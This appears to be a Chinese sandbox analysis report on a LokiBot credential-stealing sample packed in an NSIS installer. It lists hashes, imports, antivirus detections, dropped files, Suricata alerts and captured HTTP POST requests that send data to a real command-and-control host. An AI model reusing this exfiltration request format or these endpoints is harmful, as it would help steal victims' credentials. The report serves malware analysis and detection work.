比较分析...

分析任务

分析类型 虚拟机标签 开始时间 结束时间 持续时间
文件 (Windows) win7-sp1-x64-hpdapp01-1 2018-11-19 18:17:06 2018-11-19 18:19:37 151 秒

魔盾分数

10.0

Loki病毒

文件详细信息

文件名 999.exe
文件大小 212475 字节
文件类型 PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5 824a14d5534e3cb546a836cc8374cc59
SHA1 0c96e4f34564707d49948e9c35da9788006cf854
SHA256 c768d5de6c9a9c7f0db0b3714ec29a6dbb5b21d84bd47d752f1b00a017599eeb
SHA512 192fd702d17e903ddaf019bcca16ab747a407dec539462f96c3f483a45001d08d00885cd50c2447e01a87a1278cd39ca9b69c0e9f756a4f7deb5f808e0e487bc
CRC32 4C6A3BA1
Ssdeep 3072:1jeemVRCAQNb4Dg8quuK45h/cUSLNnalUN2EjxkU8dQoexMVfzlHcgMyH3gI:RURCpt8qGg/cRJahtd66VfzlHQgQI
Yara 登录查看Yara规则
样本下载 提交误报
登录查看威胁特征

运行截图

访问主机纪录 (可点击查询WPING实时安全评级)

直接 IP 安全评级 地理位置
185.247.140.223 未知

域名解析 (可点击查询WPING实时安全评级)

域名 安全评级 响应
mamujeeproduct.com A 185.247.140.223

摘要

登录查看详细行为信息

PE 信息

初始地址 0x00400000
入口地址 0x004036fc
声明校验值 0x00000000
实际校验值 0x000424a5
最低操作系统版本要求 4.0
编译时间 2016-04-04 04:21:03
载入哈希 aa1bddb976cc14514caf3362a94d13f7

PE 数据组成

名称 虚拟地址 虚拟大小 原始数据大小 特征 熵(Entropy)
.text 0x00001000 0x00006ab1 0x00006c00 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.47
.rdata 0x00008000 0x000014fc 0x00001600 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 5.09
.data 0x0000a000 0x0002d878 0x00001800 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 3.43
.ndata 0x00038000 0x0001f000 0x00000000 IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.00
.rsrc 0x00057000 0x000041d8 0x00004200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 6.03

覆盖

偏移量 0x0000e000
大小 0x00025dfb

导入

库: KERNEL32.dll:
0x408070 GetLastError
0x408078 MoveFileW
0x40807c GetFileAttributesW
0x408080 SetFileAttributesW
0x408084 Sleep
0x408088 GetTickCount
0x40808c GetFileSize
0x408090 GetModuleFileNameW
0x408094 GetCurrentProcess
0x408098 CopyFileW
0x40809c ExitProcess
0x4080a8 GetTempPathW
0x4080ac GetCommandLineW
0x4080b0 GetVersion
0x4080b4 SetErrorMode
0x4080b8 GetShortPathNameW
0x4080bc GetFullPathNameW
0x4080c0 GetDiskFreeSpaceW
0x4080c4 GlobalUnlock
0x4080c8 GlobalLock
0x4080cc CreateThread
0x4080d0 CreateDirectoryW
0x4080d4 CreateProcessW
0x4080d8 RemoveDirectoryW
0x4080dc lstrcmpiA
0x4080e0 CreateFileW
0x4080e4 GetTempFileNameW
0x4080e8 WriteFile
0x4080ec lstrcpyA
0x4080f0 lstrcpyW
0x4080f4 MoveFileExW
0x4080f8 lstrcatW
0x4080fc GetSystemDirectoryW
0x408100 GetProcAddress
0x408104 GetModuleHandleA
0x40810c SearchPathW
0x408110 CompareFileTime
0x408114 SetFileTime
0x408118 CloseHandle
0x40811c lstrcmpiW
0x408120 lstrcmpW
0x408124 WaitForSingleObject
0x408128 GlobalFree
0x40812c GlobalAlloc
0x408130 lstrlenW
0x408134 lstrcpynW
0x408138 GetExitCodeProcess
0x40813c DeleteFileW
0x408140 FindFirstFileW
0x408144 FindNextFileW
0x408148 FindClose
0x40814c SetFilePointer
0x408150 MultiByteToWideChar
0x408154 ReadFile
0x408158 lstrlenA
0x40815c MulDiv
0x408168 WideCharToMultiByte
0x40816c LoadLibraryExW
0x408170 GetModuleHandleW
0x408174 FreeLibrary
库: USER32.dll:
0x408198 GetSystemMenu
0x40819c SetClassLongW
0x4081a0 IsWindowEnabled
0x4081a4 EnableMenuItem
0x4081a8 SetWindowPos
0x4081ac GetSysColor
0x4081b0 GetWindowLongW
0x4081b4 SetCursor
0x4081b8 LoadCursorW
0x4081bc CheckDlgButton
0x4081c0 GetAsyncKeyState
0x4081c4 IsDlgButtonChecked
0x4081c8 GetMessagePos
0x4081cc LoadBitmapW
0x4081d0 CallWindowProcW
0x4081d4 IsWindowVisible
0x4081d8 CloseClipboard
0x4081dc SetClipboardData
0x4081e0 EmptyClipboard
0x4081e4 OpenClipboard
0x4081e8 EndDialog
0x4081ec GetWindowRect
0x4081f0 CreatePopupMenu
0x4081f4 GetSystemMetrics
0x4081f8 SetDlgItemTextW
0x4081fc GetDlgItemTextW
0x408200 MessageBoxIndirectW
0x408204 CharPrevW
0x408208 CharNextA
0x40820c wsprintfA
0x408210 wvsprintfW
0x408214 DispatchMessageW
0x408218 PeekMessageW
0x40821c ReleaseDC
0x408220 EnableWindow
0x408224 InvalidateRect
0x408228 SendMessageW
0x40822c DefWindowProcW
0x408230 BeginPaint
0x408234 GetClientRect
0x408238 FillRect
0x40823c DrawTextW
0x408240 ScreenToClient
0x408244 CreateWindowExW
0x408248 RegisterClassW
0x408250 CharNextW
0x408254 GetClassInfoW
0x408258 DialogBoxParamW
0x40825c CreateDialogParamW
0x408260 ExitWindowsEx
0x408264 GetDC
0x408268 PostQuitMessage
0x40826c SetTimer
0x408270 SetForegroundWindow
0x408274 LoadImageW
0x408278 SetWindowLongW
0x40827c SendMessageTimeoutW
0x408280 FindWindowExW
0x408284 IsWindow
0x408288 GetDlgItem
0x40828c TrackPopupMenu
0x408290 AppendMenuW
0x408294 EndPaint
0x408298 DestroyWindow
0x40829c wsprintfW
0x4082a0 ShowWindow
0x4082a4 SetWindowTextW
库: GDI32.dll:
0x40804c SetTextColor
0x408050 SelectObject
0x408054 SetBkMode
0x408058 CreateFontIndirectW
0x40805c CreateBrushIndirect
0x408060 DeleteObject
0x408064 GetDeviceCaps
0x408068 SetBkColor
库: SHELL32.dll:
0x408184 SHGetFileInfoW
0x408188 ShellExecuteW
0x40818c SHBrowseForFolderW
0x408190 SHFileOperationW
库: ADVAPI32.dll:
0x408000 RegDeleteKeyW
0x408004 SetFileSecurityW
0x408008 OpenProcessToken
0x408014 RegOpenKeyExW
0x408018 RegEnumValueW
0x40801c RegDeleteValueW
0x408020 RegCloseKey
0x408024 RegCreateKeyExW
0x408028 RegSetValueExW
0x40802c RegQueryValueExW
0x408030 RegEnumKeyW
库: COMCTL32.dll:
0x408038 ImageList_Create
0x40803c ImageList_Destroy
0x408040 ImageList_AddMasked
0x408044 None
库: ole32.dll:
0x4082ac OleUninitialize
0x4082b0 OleInitialize
0x4082b4 CoTaskMemFree
0x4082b8 CoCreateInstance
.text
`.rdata
@.data
.ndata
.rsrc
95x:B
v#Vh`1@
Y;5|:B
tWf="
9-LgC
9-LgC
9-LgC
9-XgC
tff95
Ph`6C
Ph`6C
UXTHEME
USERENV
SETUPAPI
APPHELP
PROPSYS
DWMAPI
CRYPTBASE
OLEACC
CLBCATQ
RichEd32
RichEd20
MulDiv
DeleteFileW
FindFirstFileW
FindNextFileW
FindClose
SetFilePointer
MultiByteToWideChar
ReadFile
lstrlenA
WideCharToMultiByte
GetPrivateProfileStringW
WritePrivateProfileStringW
FreeLibrary
LoadLibraryExW
GetModuleHandleW
GetExitCodeProcess
WaitForSingleObject
GlobalAlloc
GlobalFree
ExpandEnvironmentStringsW
lstrcmpW
lstrcmpiW
CloseHandle
SetFileTime
CompareFileTime
SearchPathW
GetShortPathNameW
GetFullPathNameW
MoveFileW
GetLastError
SetCurrentDirectoryW
GetFileAttributesW
SetFileAttributesW
Sleep
GetTickCount
GetFileSize
GetModuleFileNameW
GetCurrentProcess
CopyFileW
ExitProcess
SetEnvironmentVariableW
GetWindowsDirectoryW
GetTempPathW
GetCommandLineW
GetVersion
SetErrorMode
lstrlenW
lstrcpynW
GetDiskFreeSpaceW
GlobalUnlock
GlobalLock
CreateThread
CreateDirectoryW
CreateProcessW
RemoveDirectoryW
lstrcmpiA
CreateFileW
GetTempFileNameW
WriteFile
lstrcpyA
lstrcpyW
MoveFileExW
lstrcatW
GetSystemDirectoryW
GetProcAddress
GetModuleHandleA
KERNEL32.dll
EndPaint
DrawTextW
FillRect
GetClientRect
BeginPaint
DefWindowProcW
SendMessageW
InvalidateRect
EnableWindow
ReleaseDC
GetDC
LoadImageW
SetWindowLongW
GetDlgItem
IsWindow
FindWindowExW
SendMessageTimeoutW
wsprintfW
ShowWindow
SetForegroundWindow
PostQuitMessage
SetWindowTextW
SetTimer
CreateDialogParamW
DestroyWindow
ExitWindowsEx
CharNextW
DialogBoxParamW
GetClassInfoW
CreateWindowExW
SystemParametersInfoW
RegisterClassW
EndDialog
ScreenToClient
GetWindowRect
EnableMenuItem
GetSystemMenu
SetClassLongW
IsWindowEnabled
SetWindowPos
GetSysColor
GetWindowLongW
SetCursor
LoadCursorW
CheckDlgButton
GetAsyncKeyState
IsDlgButtonChecked
GetMessagePos
LoadBitmapW
CallWindowProcW
IsWindowVisible
CloseClipboard
SetClipboardData
EmptyClipboard
OpenClipboard
TrackPopupMenu
AppendMenuW
CreatePopupMenu
GetSystemMetrics
SetDlgItemTextW
GetDlgItemTextW
MessageBoxIndirectW
CharPrevW
CharNextA
wsprintfA
wvsprintfW
DispatchMessageW
PeekMessageW
USER32.dll
SelectObject
SetTextColor
SetBkMode
CreateFontIndirectW
CreateBrushIndirect
DeleteObject
GetDeviceCaps
SetBkColor
GDI32.dll
SHFileOperationW
ShellExecuteW
SHGetFileInfoW
SHBrowseForFolderW
SHGetPathFromIDListW
SHGetSpecialFolderLocation
SHELL32.dll
RegEnumValueW
RegEnumKeyW
RegQueryValueExW
RegSetValueExW
RegCreateKeyExW
RegCloseKey
RegDeleteValueW
RegDeleteKeyW
RegOpenKeyExW
AdjustTokenPrivileges
LookupPrivilegeValueW
OpenProcessToken
SetFileSecurityW
ADVAPI32.dll
ImageList_Destroy
ImageList_AddMasked
ImageList_Create
COMCTL32.dll
CoCreateInstance
OleUninitialize
OleInitialize
CoTaskMemFree
ole32.dll
VerQueryValueW
GetFileVersionInfoW
GetFileVersionInfoSizeW
VERSION
SHGetFolderPathW
SHFOLDER
SHAutoComplete
SHLWAPI
SHELL32
InitiateShutdownW
RegDeleteKeyExW
ADVAPI32
GetUserDefaultUILanguage
GetDiskFreeSpaceExW
SetDefaultDllDirectories
KERNEL32
{s<.8
wwwwp
wwwwww
wwwwww
wwwwwwp
wwwwwwp
wwwwww
wwwwp
wwwwwwwx
fffffox
fffffox
fffffox
fffffox
fffffox
fffffox
fffffox
fffffox
fffffox
fffffox
wwwwww
wwwwwx
fffox
fffox
fffox
fffox
fffox
fffox
fffox
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="*" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v3.0rc1</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/></application></compatibility></assembly>
NullsoftInst @
UlU+2
RichEdit
RichEdit20W
.DEFAULT\Control Panel\International
Control Panel\Desktop\ResourceLocale
Software\Microsoft\Windows\CurrentVersion
\Microsoft\Internet Explorer\Quick Launch
@logging set to %d
settings logging to %d
created uninstaller: %d, "%s"
WriteReg: error creating key "%s\%s"
WriteReg: error writing into "%s\%s" "%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegDWORD: "%s\%s" "%s"="0x%08x"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
DeleteRegKey: "%s\%s"
DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s
CopyFiles "%s"->"%s"
CreateShortcut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
Error registering DLL: Could not initialize OLE
Error registering DLL: Could not load %s
Error registering DLL: %s not found in %s
Exec: failed createprocess ("%s")
Exec: success ("%s")
Exec: command="%s"
ExecShell: success ("%s": file:"%s" params:"%s")
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
HideWindow
Pop: stack empty
Exch: stack < %d elements
RMDir: "%s"
MessageBox: %d,"%s"
Delete: "%s"
File: wrote %d to "%s"
File: error, user cancel
File: skipped: "%s" (overwriteflag=%d)
File: error, user abort
File: error, user retry
File: error creating "%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
Rename failed: %s
Rename on reboot: %s
Rename: %s
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" exists, jumping %d
SetCurrentDirectory(%s) failed (%d)
CreateDirectory: "%s" created
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: "%s" (%d)
SetFileAttributes failed.
SetFileAttributes: "%s":%08X
BringToFront
Sleep(%d)
detailprint: %s
Call: %d
Aborting: "%s"
Jump: %d
verifying installer: %d%%
http://nsis.sf.net/NSIS_Error
Error launching installer
... %d%%
SeShutdownPrivilege
\Temp
NSIS Error
Error writing temporary file. Make sure your temp folder is valid.
@install.log
%u.%u%s%s
Skipping section: "%s"
Section: "%s"
New install of "%s" to "%s"
RMDir: RemoveDirectory failed("%s")
RMDir: RemoveDirectory on Reboot("%s")
RMDir: RemoveDirectory("%s")
RMDir: RemoveDirectory invalid input("%s")
Delete: DeleteFile failed("%s")
Delete: DeleteFile on Reboot("%s")
Delete: DeleteFile("%s")
*?|<>/":
invalid registry key
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
%02x%c
%s%S.dll
MS Shell Dlg
MS Shell Dlg
msctls_progress32
SysListView32
MS Shell Dlg
MS Shell Dlg
Please wait while Setup is loading...
防病毒引擎/厂商 病毒名/规则匹配 病毒库日期
Bkav HW32.Packed. 20181113
MicroWorld-eScan Trojan.GenericKD.40750017 20181113
CMC 未发现病毒 20181113
CAT-QuickHeal 未发现病毒 20181113
McAfee Artemis!824A14D5534E 20181113
Cylance Unsafe 20181114
Zillya 未发现病毒 20181113
AegisLab Trojan.Win32.Crypmod.4!c 20181113
TheHacker 未发现病毒 20181113
BitDefender Trojan.GenericKD.40750017 20181114
K7GW Trojan ( 00540f0e1 ) 20181113
K7AntiVirus Trojan ( 00540f0e1 ) 20181113
TrendMicro 未发现病毒 20181113
Baidu 未发现病毒 20181112
Babable 未发现病毒 20180918
Cyren W32/Trojan.LEAQ-8066 20181113
Symantec Trojan Horse 20181113
ESET-NOD32 a variant of Win32/Injector.EBOK 20181113
TrendMicro-HouseCall 未发现病毒 20181113
Paloalto generic.ml 20181114
ClamAV 未发现病毒 20181113
GData Trojan.GenericKD.40750017 20181114
Kaspersky HEUR:Trojan-Ransom.Win32.Crypmod.gen 20181113
Alibaba 未发现病毒 20180921
NANO-Antivirus 未发现病毒 20181113
ViRobot Trojan.Win32.Z.Agent.212475 20181113
Rising 未发现病毒 20181113
Endgame malicious (high confidence) 20181108
Trustlook 未发现病毒 20181114
Sophos Mal/Generic-S 20181113
F-Secure Trojan.GenericKD.40750017 20181114
DrWeb Trojan.PWS.Stealer.25149 20181114
VIPRE 未发现病毒 20181113
Invincea heuristic 20181108
McAfee-GW-Edition BehavesLike.Win32.ObfusRansom.dc 20181113
Emsisoft Trojan.GenericKD.40750017 (B) 20181114
SentinelOne static engine - malicious 20181011
F-Prot 未发现病毒 20181113
Jiangmin 未发现病毒 20181114
Webroot W32.Trojan.Gen 20181114
Avira 未发现病毒 20181114
MAX malware (ai score=81) 20181114
Antiy-AVL 未发现病毒 20181113
Kingsoft 未发现病毒 20181114
Arcabit Trojan.Generic.D26DCBC1 20181113
SUPERAntiSpyware 未发现病毒 20181107
ZoneAlarm HEUR:Trojan-Ransom.Win32.Crypmod.gen 20181113
Avast-Mobile 未发现病毒 20181113
Microsoft Trojan:Win32/Skeeyah.A!rfn 20181113
AhnLab-V3 Trojan/Win32.Injector.C2826270 20181113
ALYac 未发现病毒 20181113
TACHYON 未发现病毒 20181113
VBA32 未发现病毒 20181113
Malwarebytes Trojan.Injector 20181113
Panda Trj/CI.A 20181113
Zoner 未发现病毒 20181114
Tencent 未发现病毒 20181114
Yandex 未发现病毒 20181113
Ikarus Trojan.NSIS.Agent 20181113
eGambit 未发现病毒 20181114
Fortinet W32/Injector.EBOK!tr 20181113
Ad-Aware 未发现病毒 20181112
AVG Win32:Malware-gen 20181113
Cybereason malicious.345647 20180225
Avast Win32:Malware-gen 20181113
CrowdStrike malicious_confidence_80% (W) 20181022
Qihoo-360 Win32/Trojan.Ransom.709 20181114

进程树

999.exe, PID: 2420, 上一级进程 PID: 2288
999.exe, PID: 2536, 上一级进程 PID: 2420
services.exe, PID: 428, 上一级进程 PID: 332
mscorsvw.exe, PID: 480, 上一级进程 PID: 428
taskhost.exe, PID: 280, 上一级进程 PID: 428
mscorsvw.exe, PID: 2528, 上一级进程 PID: 428
下载PCAP包

访问主机纪录 (可点击查询WPING实时安全评级)

直接 IP 安全评级 地理位置
185.247.140.223 未知

TCP

源地址 源端口 目标地址 目标端口
192.168.122.201 49171 185.247.140.223 mamujeeproduct.com 80
192.168.122.201 49173 185.247.140.223 mamujeeproduct.com 80
192.168.122.201 49174 185.247.140.223 mamujeeproduct.com 80
192.168.122.201 49177 185.247.140.223 mamujeeproduct.com 80
192.168.122.201 49181 185.247.140.223 mamujeeproduct.com 80

UDP

源地址 源端口 目标地址 目标端口
192.168.122.201 56018 192.168.122.1 53

域名解析 (可点击查询WPING实时安全评级)

域名 安全评级 响应
mamujeeproduct.com A 185.247.140.223

TCP

源地址 源端口 目标地址 目标端口
192.168.122.201 49171 185.247.140.223 mamujeeproduct.com 80
192.168.122.201 49173 185.247.140.223 mamujeeproduct.com 80
192.168.122.201 49174 185.247.140.223 mamujeeproduct.com 80
192.168.122.201 49177 185.247.140.223 mamujeeproduct.com 80
192.168.122.201 49181 185.247.140.223 mamujeeproduct.com 80

UDP

源地址 源端口 目标地址 目标端口
192.168.122.201 56018 192.168.122.1 53

HTTP 请求

URI HTTP数据
URL专业沙箱检测 -> http://mamujeeproduct.com/sfran/encode.php 
POST /sfran/encode.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: mamujeeproduct.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 737E5412
Content-Length: 246
Connection: close
URL专业沙箱检测 -> http://mamujeeproduct.com/sfran/encode.php 
POST /sfran/encode.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: mamujeeproduct.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 737E5412
Content-Length: 174
Connection: close
URL专业沙箱检测 -> http://mamujeeproduct.com/sfran/encode.php 
POST /sfran/encode.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: mamujeeproduct.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 737E5412
Content-Length: 147
Connection: close

SMTP 流量

无SMTP流量.

IRC 流量

无IRC请求.

ICMP 流量

无ICMP流量.

CIF 报告

无 CIF 结果

网络警报

Timestamp Source IP Source Port Destination IP Destination Port Protocol SID Signature Category
2018-11-19 18:18:35.626847+0800 192.168.122.201 49174 185.247.140.223 80 TCP 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) A Network Trojan was detected
2018-11-19 18:18:33.350577+0800 192.168.122.201 49171 185.247.140.223 80 TCP 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) A Network Trojan was detected
2018-11-19 18:18:34.706930+0800 192.168.122.201 49173 185.247.140.223 80 TCP 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) A Network Trojan was detected
2018-11-19 18:19:09.803182+0800 192.168.122.201 49181 185.247.140.223 80 TCP 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) A Network Trojan was detected
2018-11-19 18:18:58.498044+0800 192.168.122.201 49177 185.247.140.223 80 TCP 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) A Network Trojan was detected
2018-11-19 18:18:35.990411+0800 192.168.122.201 49174 185.247.140.223 80 TCP 2024313 ET TROJAN Loki Bot Request for C2 Commands Detected M1 A Network Trojan was detected
2018-11-19 18:19:10.159116+0800 192.168.122.201 49181 185.247.140.223 80 TCP 2024313 ET TROJAN Loki Bot Request for C2 Commands Detected M1 A Network Trojan was detected
2018-11-19 18:18:58.875878+0800 192.168.122.201 49177 185.247.140.223 80 TCP 2024313 ET TROJAN Loki Bot Request for C2 Commands Detected M1 A Network Trojan was detected
2018-11-19 18:19:10.159116+0800 192.168.122.201 49181 185.247.140.223 80 TCP 2024318 ET TROJAN Loki Bot Request for C2 Commands Detected M2 A Network Trojan was detected
2018-11-19 18:18:58.875878+0800 192.168.122.201 49177 185.247.140.223 80 TCP 2024318 ET TROJAN Loki Bot Request for C2 Commands Detected M2 A Network Trojan was detected
2018-11-19 18:18:33.686247+0800 192.168.122.201 49171 185.247.140.223 80 TCP 2024312 ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1 A Network Trojan was detected
2018-11-19 18:18:33.686247+0800 192.168.122.201 49171 185.247.140.223 80 TCP 2024317 ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2 A Network Trojan was detected
2018-11-19 18:18:35.072724+0800 192.168.122.201 49173 185.247.140.223 80 TCP 2024312 ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1 A Network Trojan was detected
2018-11-19 18:18:35.990411+0800 192.168.122.201 49174 185.247.140.223 80 TCP 2024318 ET TROJAN Loki Bot Request for C2 Commands Detected M2 A Network Trojan was detected
2018-11-19 18:18:35.072724+0800 192.168.122.201 49173 185.247.140.223 80 TCP 2024317 ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2 A Network Trojan was detected

TLS

No TLS

Suricata HTTP

No Suricata HTTP

未发现网络提取文件
文件名 8620DB.lck
相关文件
C:\Users\test\AppData\Roaming\8215A8\8620DB.lck
文件大小 1 字节
文件类型 very short file (no magic)
MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
CRC32 83DCEFB7
Ssdeep 3:U:U
下载提交魔盾安全分析
文件名 bunny.dll
相关文件
C:\Users\test\AppData\Local\Temp\bunny.dll
文件大小 19968 字节
文件类型 PE32 executable (DLL) (console) Intel 80386, for MS Windows
MD5 af01229adb25ac310922f3fef7343ad9
SHA1 a3efd4eceb3e69d67aa16f752e1b5fcf40d3867b
SHA256 b879bf1e60cb6121ce95b58cd946a5cc15848bfb8d681ffc0e5f50f0fc71af69
CRC32 D818BA65
Ssdeep 384:DCPaqCmAPyVEZonWjbY7K85dzLRO6FYYlmWSBLVYmTNWKgmfnfkW5bc:DGaqCPyWZ0eb0ldLRfFYYgyqUVm/f
下载提交魔盾安全分析
文件名 System.dll
相关文件
C:\Users\test\AppData\Local\Temp\nsi77BF.tmp\System.dll
文件大小 11776 字节
文件类型 PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD5 75ed96254fbf894e42058062b4b4f0d1
SHA1 996503f1383b49021eb3427bc28d13b5bbd11977
SHA256 a632d74332b3f08f834c732a103dafeb09a540823a2217ca7f49159755e8f1d7
CRC32 BFE90AC5
Ssdeep 192:X24sihno0bW+l97H4GB7QDs91kMtwtobTr4u+QHbazMNHT7dmNIEr:m8vJl97JeoxtN/r3z7YV
下载提交魔盾安全分析
文件名 9435f817-fed2-454e-88cd-7f78fda62c48
相关文件
C:\Windows\sysnative\LogFiles\Scm\9435f817-fed2-454e-88cd-7f78fda62c48
文件大小 12 字节
文件类型 data
MD5 e456e1e43dd4735ef5f29b0f17fdf719
SHA1 8101086a56679b938063eadec0174f228e31f541
SHA256 787bded6b6fc8db22462b4ffff5948c67b8b6da2b5144a6e29c321ade627a3f2
CRC32 6584BCE6
Ssdeep 3:IqGlll:IqC
下载提交魔盾安全分析
文件名 made.rtf
相关文件
C:\Users\test\AppData\Local\Temp\made.rtf
文件大小 7 字节
文件类型 Rich Text Format data, version 1, unknown character set
MD5 8274425de767b30b2fff1124ab54abb5
SHA1 2201589aa3ed709b3665e4ff979e10c6ad5137fc
SHA256 0d6afb7e939f0936f40afdc759b5a354ea5427ec250a47e7b904ab1ea800a01d
CRC32 CBB3AAE6
Ssdeep 3:gOY:w
Yara
  • Detected no presence of any attachment
  • Detected no presence of any image
  • Detected no presence of any url
下载提交魔盾安全分析
文件名 Marabou
相关文件
C:\Users\test\AppData\Local\Temp\Marabou
文件大小 128871 字节
文件类型 data
MD5 c1b7ea540baf0d8506932f22bd92d9a6
SHA1 a5cda2a03c13231a48738b5675ad27e50c05aadb
SHA256 0b7927557cb33169d038806e293d421c66da8fa7f2b615b42c40a13fca2234e5
CRC32 3491F6E4
Ssdeep 1536:VIu2znI+54ZFJUovSG2227jAozdvWU8jZdtMn9ozR4yAaegj3GMVfzldntcg5zj5:qnalUN2EjxkU8dQoexMVfzlHcgb
下载提交魔盾安全分析
文件名 8620DB.hdb
相关文件
C:\Users\test\AppData\Roaming\8215A8\8620DB.hdb
文件大小 4 字节
文件类型 data
MD5 247a4d7d86c77e6986a634ce0740338b
SHA1 35ea226f515758a6d7830d0929a4cccd7aedc9e0
SHA256 fbb2cbd2e352227610b639f462cb4b154ef4215ec772da7a352e10d3af0c7221
CRC32 56396382
Ssdeep 3:xon:+n
下载提交魔盾安全分析
没有发现相似的分析.
HTML 总结报告
(需15-60分钟同步)		 下载

Processing ( 28.641 seconds )

  • 12.708 Suricata
  • 10.021 NetworkAnalysis
  • 1.497 Static
  • 1.418 BehaviorAnalysis
  • 1.366 VirusTotal
  • 0.639 TargetInfo
  • 0.431 Dropped
  • 0.424 peid
  • 0.06 Debug
  • 0.058 AnalysisInfo
  • 0.015 Strings
  • 0.003 Memory
  • 0.001 config_decoder

Signatures ( 3.389 seconds )

  • 2.003 md_url_bl
  • 0.452 md_bad_drop
  • 0.11 antiav_detectreg
  • 0.072 api_spamming
  • 0.059 antivm_vbox_libs
  • 0.059 stealth_timeout
  • 0.056 stealth_decoy_document
  • 0.051 infostealer_ftp
  • 0.04 antiav_detectfile
  • 0.031 infostealer_im
  • 0.028 infostealer_bitcoin
  • 0.027 exec_crash
  • 0.023 stealth_file
  • 0.02 infostealer_mail
  • 0.019 antisandbox_sunbelt_libs
  • 0.018 md_domain_bl
  • 0.017 antiav_avast_libs
  • 0.016 antivm_vmware_libs
  • 0.016 antivm_vbox_files
  • 0.014 antisandbox_sboxie_libs
  • 0.014 antiav_bitdefender_libs
  • 0.011 mimics_filetime
  • 0.01 antivm_generic_scsi
  • 0.01 geodo_banking_trojan
  • 0.009 reads_self
  • 0.009 shifu_behavior
  • 0.009 virus
  • 0.008 bootkit
  • 0.008 kibex_behavior
  • 0.008 antivm_generic_disk
  • 0.007 antivm_generic_services
  • 0.007 betabot_behavior
  • 0.007 anomaly_persistence_autorun
  • 0.007 ransomware_files
  • 0.006 hancitor_behavior
  • 0.006 antivm_xen_keys
  • 0.006 ransomware_extensions
  • 0.005 network_tor
  • 0.005 anormaly_invoke_kills
  • 0.005 antivm_parallels_keys
  • 0.005 darkcomet_regkeys
  • 0.005 network_http
  • 0.005 rat_pcclient
  • 0.004 antivm_generic_diskreg
  • 0.003 tinba_behavior
  • 0.003 hawkeye_behavior
  • 0.003 antisandbox_sleep
  • 0.003 kazybot_behavior
  • 0.003 antivm_vmware_files
  • 0.003 disables_browser_warn
  • 0.003 codelux_behavior
  • 0.003 network_torgateway
  • 0.003 recon_fingerprint
  • 0.002 rat_nanocore
  • 0.002 injection_createremotethread
  • 0.002 cerber_behavior
  • 0.002 kovter_behavior
  • 0.002 sniffer_winpcap
  • 0.002 antisandbox_productid
  • 0.002 antivm_xen_keys
  • 0.002 antivm_hyperv_keys
  • 0.002 antivm_vbox_acpi
  • 0.002 antivm_vbox_keys
  • 0.002 antivm_vmware_keys
  • 0.002 antivm_vpc_keys
  • 0.002 browser_security
  • 0.002 modify_proxy
  • 0.002 targeted_flame
  • 0.001 antiemu_wine_func
  • 0.001 infostealer_browser
  • 0.001 network_anomaly
  • 0.001 ursnif_behavior
  • 0.001 infostealer_browser_password
  • 0.001 bypass_firewall
  • 0.001 antisandbox_sunbelt_files
  • 0.001 antivm_generic_bios
  • 0.001 antivm_generic_cpu
  • 0.001 antivm_generic_system
  • 0.001 antivm_vpc_files
